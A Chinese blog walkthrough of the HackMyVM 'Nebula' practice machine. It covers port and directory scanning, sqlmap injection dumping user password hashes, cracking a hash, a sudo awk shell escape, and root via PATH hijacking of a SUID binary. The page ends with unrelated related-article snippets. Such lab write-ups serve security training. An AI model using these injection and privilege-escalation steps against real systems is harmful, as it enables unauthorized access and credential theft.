[HackMyVM]靶场 Nebula

最新推荐文章于 2024-06-19 19:49:59 发布
最新推荐文章于 2024-06-19 19:49:59 发布
阅读量528 收藏 8
点赞数 13
分类专栏: hackmyvm 文章标签: 网络空间安全 内网渗透 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34942239/article/details/136937366
版权

kali:192.168.56.104

靶机:192.168.56.125

端口扫描

# nmap 192.168.56.125
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-22 12:35 CST
Nmap scan report for 192.168.56.125
Host is up (0.00051s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:31:E0:4D (Oracle VirtualBox virtual NIC)

开启 22 80端口

先扫一下目录

# gobuster dir -u http://192.168.56.125 -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.125
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,bak,zip,html,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/index.php            (Status: 200) [Size: 3479]
/img                  (Status: 301) [Size: 314] [--> http://192.168.56.125/img/]
/login                (Status: 301) [Size: 316] [--> http://192.168.56.125/login/]
/joinus               (Status: 301) [Size: 317] [--> http://192.168.56.125/joinus/]

就一个login和joinus

去看web

joinus有个超链接,点进去有说明

没想到他给的这个例子居然真的能登录

admin/d46df8e6a5627debf930f7b5c8f3b083(直接复制会有一个换行键登不上去)

进去Search Centrals发现有sql注入

直接把请求包放入sqlmap跑

sqlmap -l sql.txt --batch --dbs   #爆库
[*] information_schema
[*] nebuladb


sqlmap -l sql.txt --batch -D nebuladb --tables #爆表

+----------+
| central  |
| centrals |
| users    |
+----------+



sqlmap -l sql.txt --batch -D nebuladb -T users --dump #爆数据
+----+----------+----------------------------------+-------------+
| id | is_admin | password                         | username    |
+----+----------+----------------------------------+-------------+
| 1  | 1        | d46df8e6a5627debf930f7b5c8f3b083 | admin       |
| 2  | 0        | c8c605999f3d8352d7bb792cf3fdb25b | pmccentral  |
| 3  | 0        | 5f823f1ac7c9767c8d1efbf44158e0ea | Frederick   |
| 3  | 0        | 4c6dda8a9d149332541e577b53e2a3ea | Samuel      |
| 5  | 0        | 41ae0e6fbe90c08a63217fc964b12903 | Mary        |
| 6  | 0        | 5d8cdc88039d5fc021880f9af4f7c5c3 | hecolivares |
| 7  | 1        | c8c605999f3d8352d7bb792cf3fdb25b | pmccentral  |
+----+----------+----------------------------------+-------------+

经过md5碰撞发现pmccentral的密码是999999999

工具地址

MD5 在線免費解密 MD5、SHA1、MySQL、NTLM、SHA256、SHA512、Wordpress、Bcrypt 的雜湊 (hashes.com)

ssh连接之后发现pmccentral没有user flag,用户目录下有个employees的文件,里面全是人名

pmccentral@laboratoryuser:~$ cd documents/
pmccentral@laboratoryuser:~/documents$ ls -al
total 12
drwxrwxr-x 2 pmccentral pmccentral 4096 Mar 22 04:32 .
drwxr-xr-x 7 pmccentral pmccentral 4096 Mar 22 04:32 ..
-rwxrwxrwx 1 pmccentral pmccentral  876 Mar 22 04:32 employees.txt

想办法横向到laboratoryadmin

sudo -l发现可以

pmccentral@laboratoryuser:/home$ sudo -l
[sudo] password for pmccentral: 
Matching Defaults entries for pmccentral on laboratoryuser:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User pmccentral may run the following commands on laboratoryuser:
    (laboratoryadmin) /usr/bin/awk

直接一手

sudo -u laboratoryadmin  /usr/bin/awk 'BEGIN {system("/bin/sh")}'
pmccentral@laboratoryuser:/home$ sudo -u laboratoryadmin  /usr/bin/awk 'BEGIN {system("/bin/sh")}'
$ whoami
laboratoryadmin
$ /usr/bin/script -qc /bin/bash /dev/null
laboratoryadmin@laboratoryuser:/home$

成功跳转到laboratoryadmin用户,并且用户目录下有user.txt拿到第一个flag

laboratoryadmin@laboratoryuser:~$ ls -al
total 64
drwx------ 11 laboratoryadmin laboratoryadmin 4096 Mar 22 04:24 .
drwxr-xr-x  4 root            root            4096 Dec 17 15:34 ..
drwxr-xr-x  2 laboratoryadmin laboratoryadmin 4096 Mar 22 04:33 autoScripts
-rw-------  1 laboratoryadmin laboratoryadmin  420 Mar 22 04:07 .bash_history
-rw-r--r--  1 laboratoryadmin laboratoryadmin  220 Dec 17 15:29 .bash_logout
-rw-r--r--  1 laboratoryadmin laboratoryadmin 3771 Dec 17 15:29 .bashrc
drwxr-xr-x  2 laboratoryadmin laboratoryadmin 4096 Dec 17 15:34 desktop
drwxr-xr-x  2 laboratoryadmin laboratoryadmin 4096 Dec 17 15:34 documents
drwxr-xr-x  2 laboratoryadmin laboratoryadmin 4096 Dec 17 15:34 downloads
drwx------  3 laboratoryadmin laboratoryadmin 4096 Mar 22 04:13 .gnupg
drwxr-xr-x  2 laboratoryadmin laboratoryadmin 4096 Dec 17 15:34 home
drwxrwxr-x  3 laboratoryadmin laboratoryadmin 4096 Dec 17 15:30 .local
-rw-r--r--  1 laboratoryadmin laboratoryadmin  807 Dec 17 15:29 .profile
drwx------  3 laboratoryadmin laboratoryadmin 4096 Mar 22 04:13 snap
drwx------  2 laboratoryadmin laboratoryadmin 4096 Mar 22 04:24 .ssh
-rw-r--r--  1 laboratoryadmin laboratoryadmin   33 Dec 18 16:15 user.txt

有一个文件叫autoScripts翻译过来就是自动脚本

laboratoryadmin@laboratoryuser:~/autoScripts$ ls -al
total 32
drwxr-xr-x  2 laboratoryadmin laboratoryadmin  4096 Mar 22 04:48 .
drwx------ 11 laboratoryadmin laboratoryadmin  4096 Mar 22 04:48 ..
-rwxrwxrwx  1 laboratoryadmin laboratoryadmin     8 Mar 22 04:48 head
-rwsr-xr-x  1 root            root            16792 Dec 17 15:40 PMCEmployees
laboratoryadmin@laboratoryuser:~/autoScripts$ cat head
bash -p

里面的PMCEmployees可执行文件有root权限

当前目录的head指令是bash -p

把可执行文件反编译看一下是什么东西

放到IDA 64看一下

以root权限执行 head /home/pmccentral/documents/employees.txt

那么这就可以利用提权了

第一种方法,因为我们可以write 这个head,所以可以手改head,注意修改环境变量,把head改成我们修改的head

laboratoryadmin@laboratoryuser:~/autoScripts$ vim head
laboratoryadmin@laboratoryuser:~/autoScripts$ cat head
/bin/bash                                                      #改成/bin/bash
laboratoryadmin@laboratoryuser:~/autoScripts$ export PATH="$PWD:$PATH"  #修改环境变量
laboratoryadmin@laboratoryuser:~/autoScripts$ ./PMCEmployees 
root@laboratoryuser:~/autoScripts# whoami
root

第二种,就利用原来的head,因为它里面是bash -p也能让我们拿到root权限

laboratoryadmin@laboratoryuser:~/autoScripts$ which head
/usr/bin/head
laboratoryadmin@laboratoryuser:~/autoScripts$ export PATH="$PWD:$PATH"
laboratoryadmin@laboratoryuser:~/autoScripts$ which head
/home/laboratoryadmin/autoScripts/head
laboratoryadmin@laboratoryuser:~/autoScripts$ ./PMCEmployees 
root@laboratoryuser:~/autoScripts# whoami
root

总之注意修改环境变量.

tao0845
关注
  • 13
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
nebula-V3.3.0镜像资源包
01-23
nebula-V3.3.0镜像资源包,包含meta、storged及graphd对应的镜像,以及nebula-console文件
eclipse nebula部件
12-31
Nebula 提供了一组自定义的SWT控件和其它UI组件。 将nebula.zip解压到eclipse的安装目录下的dropins文件夹中clean方式重启eclipse
Nebula - hackmyvm
tanbinn的博客
04-29 227
hackmyvmNebula靶场
Nebula Graph - 全文索引
小毕超博客
05-22 2102
一、Nebula Graph - 全文索引 Nebula Graph 的全文索引,需要依靠于 Elasticsearch ,并且还存在着较多的限制,比如: 全文索引当前仅支持LOOKUP语句。 定长字符串长度超过 256 字节,将无法创建全文索引。 如果 Tag/Edge type 上存在全文索引,无法删除或修改 Tag/Edge type。 一个 Tag/Edge type 只能有一个全文索引。 属性的类型必须为String。 全文索引不支持多个 Tag/Edge type 的搜索。 不支持排序全文搜索
Nebula Graph - SpringBoot 操作 Nebula
小毕超博客
05-05 4559
一、Nebula Graph 前面两篇文章,讲解了下 Nebula Graph 的安装,及 nGQL 的使用,本篇文章讲解下在 java 环境下如何对 Nebula Graph 进行操作,使用 SpringBoot 环境。 下面是上篇文章的地址: https://blog.csdn.net/qq_43692950/article/details/124579284 二、SpringBoot 操作 Nebula Graph ...
Docker部署Nebula Graph2.0和Studio
贾继康的博客
06-06 1507
文章目录Docker部署Nebula Graph2.0和Studio一、前言1.1 关于图数据库相关的概念以及知识点,可参考:1.2 环境配置说明二、docker安装部署2.1 docker安装2.2 docker相关命令2.3 docker配置加速器2.4 验证加速器三、Nebula Graph2.0和Studio安装部署3.1 Nebula Graph2.0和Studio资源获取3.2 创建网络3.3 修改repo3.3.1 修改nebula-docker-compose3.3.2 修改web stud
nebula模拟器_nebula模拟器
weixin_39542111的博客
12-21 613
nebula模拟器是一款专为三国战记设计的游戏模拟工具。nebula模拟器支持neogeo、igs、konami等技术支持,拥有非常多的画面处理效果,是第一个能够支持三国战记游戏运行模拟软件。nebula模拟器使用说明:1、界面的选择运行“nebulaconfig.exe”,在“GUI”选项中选择“NEW window GUI”按“Continue”,出现类似“winkawaks”的界面,选择"C...
Nebula基础的查询操作介绍
大风的博客
08-24 1509
这里只是对Nebula基础查询进行介绍,其目的是为了让未接触过Nebula的同学最短时间了解其语句。更详细更准确的内可以查看官方文档。关于查询这里并没有使用官方例子数据,而是自己实际尝试了文档中的语句。
Nebula Graph-01-Nebula Graph简介和安装以及客户端连接
苍煜
03-19 1705
NebulaGraph 是一款开源的、分布式的、易扩展的原生图数据库,能够承载包含数千亿个点和数万亿条边的超大规模数据集,并且提供毫秒级查询。NebulaGraph 的优势开源高性能易扩展易开发高可靠访问控制生态多样化兼容 openCypher 查询语言面向未来硬件,读写平衡灵活数据建模广受欢迎(我觉得就是因为开源-免费的)适用场景欺诈检测实时推荐知识图谱社交网络。
Nebula Graph - 集群模式部署
小毕超博客
05-16 2359
一、Nebula Graph - 集群模式部署 Nebula Graph 不提供官方的集群部署工具,需要使用 RPM 或 DEB 文件手动部署集群。 部署架构: 主机 角色 192.168.40.39 graph、storage、meta 192.168.40.40 graph、storage、meta 192.168.40.41 graph、storage、meta 在每台主机上都安装 Nebula Graph: 下载 rpm 安装包 wget https://oss-cd
Nebula编译
qq_37157498的博客
08-30 2615
Cent7.x 编译nebula过程 1.环境准备 ​ 确保安装了libtool,autoconf-archive,maven sudo yum install -y readline-devel sudo yum install -y ncurses-devel 2.创建一个系统用户 sudo adduser --system --user-group --home /home/engshar...
nebula-console-arm-v3.3.0
01-23
重名为nebula-console 使用nebula-console连接数据库:./nebula-console -addr A机器ip -port 9669 -u root -p nebula
nebula使用Docker单节点部署yaml文件
01-23
nebula使用Docker单节点部署yaml文件
Docker搭建分布式集群nebula操作手册.pdf
10-22
Docker搭建分布式集群nebula操作手册,亲自操作整理,无坑。
安全】Linux Fanotify使用入门
追寻梦想的青春
06-19 438
fanotify是另一种文件监控机制,在使用上两者类似,都是先调用init函数初始化句柄,然后调用类似watch的函数添加监控路径,再使用select+read的方式读取出变化的事件,根据事件中给出的参数获取文件的路径、事件类型以及其他需要的数据。如果是监控主机上的路径,directed结合FAN_EVENT_ON_CHILD标志就只能监控目录以及目录下的文件,per-mount可以监控pathname所在的挂载点中所有文件或者目录的变化,而global模式可以监控整个文件系统。
前端开发之浏览器安全
最新发布
weixin_45511682的博客
06-19 827
浏览器安全,#XSS攻击、CSRF攻击、中间人攻击、前端安全问题与防范、网络劫持防范
NTFS安全权限
2302_80097039的博客
06-12 795
NTFS权限是基于。
SSL证书怎样配置部署更安全
2301_77689616的博客
06-19 141
可以考虑使用自动化的证书管理工具,如Certbot或Let's Encrypt,来自动化证书的颁发和更新过程,减少人为操作的疏漏。通过使用强大的加密算法、强制HTTPS、定期更新SSL证书、配置安全的服务器环境和进行安全的证书管理,可以帮助网站管理员更好地保护网站的安全。可以考虑使用证书管理工具来集中管理证书,定期检查证书的有效期和状态,以及证书的使用情况,确保证书的有效性和安全性。它通过建立安全的连接,确保网站的身份和保护用户的隐私,是网站安全的重要组成部分。5.进行安全的证书管理。
mac安装nebula
08-17
您好!要在Mac上安装Nebula,您可以按照以下步骤进行操作: 1. 首先,确保您的Mac系统已经安装了Homebrew。如果没有安装,请打开终端并输入以下命令安装Homebrew: ``` /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)" ``` 2. 安装Nebula的依赖库。在终端中运行以下命令: ``` brew install openssl cmake ``` 3. 克隆Nebula的源代码。在终端中运行以下命令: ``` git clone https://github.com/vesoft-inc/nebula.git ``` 4. 进入Nebula的源代码目录。在终端中运行以下命令: ``` cd nebula ``` 5. 构建和编译Nebula。在终端中运行以下命令: ``` cmake -B build cmake --build build ``` 6. 安装Nebula。在终端中运行以下命令: ``` sudo cmake --install build ``` 7. 完成安装后,您可以通过在终端中输入以下命令来验证Nebula是否成功安装: ``` nebula --version ``` 这样,您就成功在Mac上安装了Nebula。祝您使用愉快!如果您有任何问题,请随时向我提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

tao0845

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值